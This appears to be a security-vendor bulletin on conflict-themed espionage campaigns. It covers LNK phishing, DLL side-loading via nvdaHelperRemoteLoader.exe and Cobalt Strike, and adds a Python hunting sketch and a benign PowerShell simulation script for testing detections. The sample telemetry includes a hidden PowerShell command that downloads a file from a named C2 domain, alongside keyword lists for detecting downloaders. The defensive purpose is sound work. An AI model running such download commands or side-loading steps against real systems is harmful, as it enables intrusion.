SOC Prime Bias: Critical

25 Mar 2026 19:16

Iran Conflict Drives Surge in Espionage Activity Across Middle East Targets

Ruslan Mikhalov, Chief of Threat Research at SOC Prime

Detection stack

  • AIDR
  • Alert
  • ETL
  • Query

Summary

Proofpoint reported a rise in espionage and phishing activity tied to Iranian, Chinese, Pakistani, Belarusian, and other state-aligned threat actors after the February 2026 strikes in Iran. Adversaries used conflict-themed lures to target government ministries, diplomatic organizations, and think tanks across the Middle East and the United States. These operations relied on credential phishing, malicious LNK files, DLL sideloading, and Cobalt Strike payloads delivered through compromised email accounts and cloud-hosted infrastructure. Detection efforts should prioritize malicious LNK shortcuts, fake OneDrive-style login pages, and suspicious use of known malware loaders.

Investigation

Proofpoint tracked six separate campaigns — UNK_InnerAmbush, TA402, UNK_RobotDreams, UNK_NightOwl, TA473, and TA453 — that used email compromise, weaponized archives, and malicious links to deliver loaders that eventually launched Cobalt Strike. The researchers catalogued indicators including email addresses, domains, URLs, filenames, and file hashes. Where possible, the report also mapped the observed infrastructure to previously documented public reporting.

Mitigation

Organizations should require MFA for email and cloud platforms, block known malicious domains and URLs, and monitor for LNK execution and unexpected DLL loading activity. Email security controls should inspect attachments for LNK and archive-based delivery, while threat hunting should emphasize Cobalt Strike beacon behavior and unusual PowerShell execution.

Response

If a suspicious LNK, malicious archive, or Cobalt Strike beacon is identified, isolate the host, collect volatile evidence, and begin incident response immediately. Block related command-and-control domains and IP addresses, reset compromised accounts, and perform a full forensic investigation to identify any persistence mechanisms.

Attack Flow

    graph TB
        %% Class Definitions Section
        classDef action fill:#99ccff
        classDef artifact fill:#ffcc99
        classDef process fill:#ffeb99
        classDef malware fill:#ff9999
        classDef service fill:#ccffcc
        classDef credential fill:#dddddd

        %% Nodes – Actions (Techniques)
        action_phishing_spear["<b>Action</b> – <b>T1566.001 Phishing: Spearphishing Attachment</b><br/><b>Description</b>: Send emails with malicious ZIP or LNK attachments that execute code when opened.<br/><b>Confidence</b>: High"]
        class action_phishing_spear action
        action_execution_ps["<b>Action</b> – <b>T1059.001 PowerShell</b><br/><b>Description</b>: Use PowerShell to download and execute additional payloads.<br/><b>Confidence</b>: High"]
        class action_execution_ps action
        action_defense_proxy["<b>Action</b> – <b>T1218 System Binary Proxy Execution</b><br/><b>Description</b>: Load malicious DLL via signed binary (nvdaHelperRemoteLoader.exe).<br/><b>Confidence</b>: High"]
        class action_defense_proxy action
        action_c2_web["<b>Action</b> – <b>T1102.002 Web Service: Bidirectional Communication</b><br/><b>Description</b>: Communicate with C2 hosts using web services such as Azure Front Door and OneDrive.<br/><b>Confidence</b>: High"]
        class action_c2_web action
        action_persistence_account["<b>Action</b> – <b>T1098 Account Manipulation</b> & <b>T1078 Valid Accounts</b><br/><b>Description</b>: Use compromised email accounts to maintain foothold and send further phishing.<br/><b>Confidence</b>: High"]
        class action_persistence_account action
        action_phishing_additional["<b>Action</b> – <b>T1566 Phishing (Additional)</b><br/><b>Description</b>: Host fake OWA/OneDrive credential pages to harvest credentials.<br/><b>Confidence</b>: High"]
        class action_phishing_additional action

        %% Nodes – Artifacts
        artifact_zip["<b>Artifact</b> – Malicious ZIP attachment<br/><b>Content</b>: LNK and PDF files with embedded payloads"]
        class artifact_zip artifact
        artifact_lnk["<b>Artifact</b> – LNK file (nvdaHelperRemoteLoader.exe)"]
        class artifact_lnk artifact
        artifact_ps_script["<b>Artifact</b> – PowerShell script used for download"]
        class artifact_ps_script artifact
        artifact_dll["<b>Artifact</b> – Malicious DLL (nvdaHelperRemote.dll)"]
        class artifact_dll malware

        %% Nodes – Processes / Tools
        process_loader["<b>Process</b> – nvdaHelperRemoteLoader.exe (signed binary)"]
        class process_loader process
        process_powershell["<b>Process</b> – PowerShell.exe executing download script"]
        class process_powershell process

        %% Nodes – Command & Control Services
        service_c2_almer["<b>Service</b> – support.almersalstore.com (C2 domain)"]
        class service_c2_almer service
        service_c2_azure["<b>Service</b> – Azure Front Door host"]
        class service_c2_azure service
        service_c2_onedrive["<b>Service</b> – OneDrive file link (C2)"]
        class service_c2_onedrive service

        %% Nodes – Credentials / Accounts
        credential_email["<b>Credential</b> – Compromised government email account"]
        class credential_email credential

        %% Connections – Attack Flow
        action_phishing_spear -->|delivers| artifact_zip
        artifact_zip -->|contains| artifact_lnk
        artifact_lnk -->|executes| process_loader
        process_loader -->|uses| action_defense_proxy
        action_defense_proxy -->|loads| artifact_dll
        artifact_dll -->|enables| action_execution_ps
        action_execution_ps -->|runs| process_powershell
        process_powershell -->|downloads payload via| artifact_ps_script
        process_powershell -->|communicates with| service_c2_almer
        process_powershell -->|communicates with| service_c2_azure
        process_powershell -->|communicates with| service_c2_onedrive
        service_c2_almer -->|supports| action_persistence_account
        service_c2_azure -->|supports| action_persistence_account
        service_c2_onedrive -->|supports| action_persistence_account
        action_persistence_account -->|uses| credential_email
        credential_email -->|sends| action_phishing_additional
        action_phishing_additional -->|hosts| artifact_zip

Detections

  • Suspicious Binary / Scripts in Autostart Location (via file_event), by SOC Prime Team, 25 Mar 2026
  • Suspicious Files in Public User Profile (via file_event), by SOC Prime Team, 25 Mar 2026
  • Possible Data Infiltration / Exfiltration / C2 via Third Party Services / Tools (via dns), by SOC Prime Team, 25 Mar 2026
  • Suspicious Extracted Files from an Archive (via file_event), by SOC Prime Team, 25 Mar 2026
  • Possible NvdaHelperRemote DLL Side-Loading Attempt (via image_load), by SOC Prime Team, 17 Mar 2026
  • Suspicious CURL Usage (via cmdline), by SOC Prime Team, 25 Mar 2026
  • Possible Data Infiltration / Exfiltration / C2 via Third Party Services / Tools (via proxy), by SOC Prime Team, 25 Mar 2026
  • Possible Google Docs Domain Being Resolved By Uncommon Process (via dns_query), by SOC Prime Team, 25 Mar 2026
  • Virtual Hard Disk File was Created (via file_event), by SOC Prime Team, 25 Mar 2026
  • IOCs (HashSha256) to detect: Iran conflict drives heightened espionage activity against Middle East targets, by SOC Prime AI Rules, 17 Mar 2026
  • IOCs (SourceIP) to detect: Iran conflict drives heightened espionage activity against Middle East targets, by SOC Prime AI Rules, 17 Mar 2026
  • IOCs (DestinationIP) to detect: Iran conflict drives heightened espionage activity against Middle East targets, by SOC Prime AI Rules, 17 Mar 2026
  • Detection of Suspicious Execution of nvdaHelperRemoteLoader.exe and VLCMediaPlayer.exe [Windows Process Creation], by SOC Prime AI Rules, 17 Mar 2026
  • Detection of C&C Domains Associated with UNK_InnerAmbush and UNK_RobotDreams Campaigns [Windows Network Connection], by SOC Prime AI Rules, 17 Mar 2026
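As an added example, not code from SOC Prime, Proofpoint or any of the rules listed above, the following Python sketches the hunting checks the Mitigation section calls for and that the process-creation, image_load and dns rules in the list cover: a known loader name started outside its install directory, nvdaHelperRemote.dll side-loaded from the loader's own directory, a PowerShell download spawned by Explorer (an opened LNK) or by the loader, a query for the listed C2 domain, and a cloud document host resolved by a process that is not a browser or mail client. The events are constructed Sysmon-style dicts rather than real telemetry, and the trusted directories, browser list, command-line markers and cloud domains are assumptions chosen for illustration; only the two executable names, the DLL name and support.almersalstore.com come from the page.

```python
import ntpath

# Identifiers taken from the bulletin: loader names, the side-loaded DLL and one C2 domain.
LOADER_NAMES = {"nvdahelperremoteloader.exe", "vlcmediaplayer.exe"}
SIDELOADED_DLL = "nvdahelperremote.dll"
C2_DOMAINS = {"support.almersalstore.com"}
# Assumptions for illustration (not from the report): where the real binaries are expected to
# live, which processes may legitimately resolve cloud document hosts, and which hosts those are.
TRUSTED_DIRS = ("c:\\program files\\", "c:\\program files (x86)\\", "c:\\windows\\")
BROWSERS = {"chrome.exe", "msedge.exe", "firefox.exe", "outlook.exe"}
CLOUD_DOC_DOMAINS = {"docs.google.com", "onedrive.live.com", "1drv.ms"}
DOWNLOAD_MARKERS = ("invoke-webrequest", "iwr ", "downloadstring", "downloadfile",
                    "start-bitstransfer", "curl ", "-enc ")


def _base(path):
    return ntpath.basename(path).lower()


def _in_trusted_dir(path):
    return path.lower().startswith(TRUSTED_DIRS)


def _matches_domain(query, domains):
    return any(query == d or query.endswith("." + d) for d in domains)


def check_event(ev):
    """Return the finding labels raised by one Sysmon-style event dict.

    EventID 1 = process creation, 7 = image load, 22 = DNS query (Sysmon numbering).
    """
    findings = []
    eid = ev["EventID"]
    if eid == 1:
        image, parent = _base(ev["Image"]), _base(ev.get("ParentImage", ""))
        cmd = ev.get("CommandLine", "").lower()
        # Check 1: a known loader name executing outside its install directory.
        if image in LOADER_NAMES and not _in_trusted_dir(ev["Image"]):
            findings.append("loader_outside_install_dir")
        # Check 2: a PowerShell downloader spawned by Explorer (opened LNK) or by the loader.
        if image in {"powershell.exe", "pwsh.exe"} and parent in {"explorer.exe", *LOADER_NAMES}:
            if any(m in cmd for m in DOWNLOAD_MARKERS):
                findings.append("powershell_download_from_shell_or_loader")
    elif eid == 7:
        # Check 3: the DLL the loader expects, pulled from the loader's own untrusted directory.
        if (_base(ev["ImageLoaded"]) == SIDELOADED_DLL
                and ntpath.dirname(ev["ImageLoaded"]).lower() == ntpath.dirname(ev["Image"]).lower()
                and not _in_trusted_dir(ev["ImageLoaded"])):
            findings.append("dll_sideload_from_untrusted_dir")
    elif eid == 22:
        query, proc = ev["QueryName"].lower().rstrip("."), _base(ev["Image"])
        # Check 4: known C2 domain, whatever the process.
        if _matches_domain(query, C2_DOMAINS):
            findings.append("known_c2_domain")
        # Check 5: cloud document host resolved by something that is not a browser or mail client.
        if proc not in BROWSERS and _matches_domain(query, CLOUD_DOC_DOMAINS):
            findings.append("cloud_doc_domain_from_uncommon_process")
    return findings


def hunt(events):
    """Run every check over a list of events; returns (event index, finding) pairs."""
    return [(i, f) for i, ev in enumerate(events) for f in check_event(ev)]


# Constructed sample telemetry following the chain in the attack flow above (not real events).
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
SAMPLE_EVENTS = [
    # 0: the opened LNK makes Explorer start the loader from a user-writable directory
    {"EventID": 1, "Image": r"C:\Users\alice\Downloads\brief\nvdaHelperRemoteLoader.exe",
     "ParentImage": r"C:\Windows\explorer.exe", "CommandLine": "nvdaHelperRemoteLoader.exe"},
    # 1: the loader side-loads the DLL sitting next to it
    {"EventID": 7, "Image": r"C:\Users\alice\Downloads\brief\nvdaHelperRemoteLoader.exe",
     "ImageLoaded": r"C:\Users\alice\Downloads\brief\nvdaHelperRemote.dll"},
    # 2: the DLL spawns a hidden PowerShell downloader
    {"EventID": 1, "Image": PS,
     "ParentImage": r"C:\Users\alice\Downloads\brief\nvdaHelperRemoteLoader.exe",
     "CommandLine": 'powershell -w hidden -c "iwr https://support.almersalstore.com/u -OutFile a.bin"'},
    # 3: the downloader resolves the C2 domain
    {"EventID": 22, "Image": PS, "QueryName": "support.almersalstore.com"},
    # 4: benign (assumed path): the real screen-reader loader reads its DLL from its install tree
    {"EventID": 7, "Image": r"C:\Program Files (x86)\NVDA\nvdaHelperRemoteLoader.exe",
     "ImageLoaded": r"C:\Program Files (x86)\NVDA\lib\nvdaHelperRemote.dll"},
    # 5: benign: a browser resolving Google Docs
    {"EventID": 22, "Image": r"C:\Program Files\Google\Chrome\Application\chrome.exe",
     "QueryName": "docs.google.com"},
    # 6: suspicious: PowerShell, not a browser, resolving a OneDrive host
    {"EventID": 22, "Image": PS, "QueryName": "onedrive.live.com"},
]

if __name__ == "__main__":
    for idx, finding in hunt(SAMPLE_EVENTS):
        print(f"event {idx}: {finding}")
```

Events 4 and 5 are the baseline cases the checks must stay quiet on; the side-load check deliberately requires the DLL to come from the loader's own directory, which is what distinguishes the dropped copy from a legitimate install.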

Simulation Execution

Prerequisite: The Telemetry & Baseline Pre‑flight Check must have passed.

Rationale: This section details the precise execution of the adversary technique (TTP) designed to trigger the detection rule. The commands and narrative MUST directly reflect the TTPs identified and aim to generate the exact telemetry expected by the detection logic.

  • Attack Narrative & Commands:
    An adversary has obtained a copy of nvdaHelperRemoteLoader.exe paired with a malicious DLL (evil.dll) that the loader side-loads. They place the binary in C:\Temp and create a shortcut that points to it, with a scheduled task (T1053.005) used to trigger execution. Simultaneously, they abuse the signed binary VLCMediaPlayer.exe (T1218) to launch a PowerShell payload that performs host fingerprinting. The script below launches both binaries directly, without the shortcut or task, so that the process‑creation event contains the exact executable name required by the rule.

  • Regression Test Script:

    # -------------------------------------------------
    # Simulation script – triggers both detections
    # -------------------------------------------------
    # Set execution folder
    $binPath = "C:\Temp"
    New-Item -ItemType Directory -Path $binPath -Force | Out-Null
    
    # 1. Deploy nvdaHelperRemoteLoader.exe (placeholder copy).
    #    Any benign executable renamed to this file name is enough: the
    #    process-creation rule keys on the executable name, not its contents.
    $nvdaSrc = "C:\Tools\Mocks\nvdaHelperRemoteLoader.exe"   # <-- replace with your test binary
    $nvdaDst = Join-Path $binPath "nvdaHelperRemoteLoader.exe"
    if (-not (Test-Path $nvdaSrc)) { throw "Test binary not found: $nvdaSrc" }
    Copy-Item -Path $nvdaSrc -Destination $nvdaDst -Force
    
    # 2. Deploy VLCMediaPlayer.exe (placeholder copy)
    $vlcSrc = "C:\Tools\Mocks\VLCMediaPlayer.exe"           # <-- replace with your test binary
    $vlcDst = Join-Path $binPath "VLCMediaPlayer.exe"
    if (-not (Test-Path $vlcSrc)) { throw "Test binary not found: $vlcSrc" }
    Copy-Item -Path $vlcSrc -Destination $vlcDst -Force
    
    # 3. Execute nvdaHelperRemoteLoader.exe (simulating DLL sideloading)
    Write-Host "Launching nvdaHelperRemoteLoader.exe ..."
    Start-Process -FilePath $nvdaDst -WindowStyle Hidden
    
    # 4. Execute VLCMediaPlayer.exe with a fingerprinting PowerShell one‑liner on its
    #    command line (Get-CimInstance replaces the deprecated Get-WmiObject)
    $psCmd = "Get-CimInstance Win32_OperatingSystem | Select-Object Caption,Version"
    Write-Host "Launching VLCMediaPlayer.exe with PowerShell payload ..."
    Start-Process -FilePath $vlcDst `
        -ArgumentList @("-I", "dummy", "--dummy-arg", "powershell -Command `"$psCmd`"") `
        -WindowStyle Hidden
    
    Write-Host "Simulation complete. Verify alerts in your SIEM."
  • Cleanup Commands:

    # Stop any lingering test processes
    Get-Process -Name "nvdaHelperRemoteLoader","VLCMediaPlayer" -ErrorAction SilentlyContinue |
        Stop-Process -Force
    
    # Remove the test binaries
    Remove-Item -Path "C:\Temp\nvdaHelperRemoteLoader.exe","C:\Temp\VLCMediaPlayer.exe" -Force -ErrorAction SilentlyContinue
    
    Write-Host "Cleanup finished."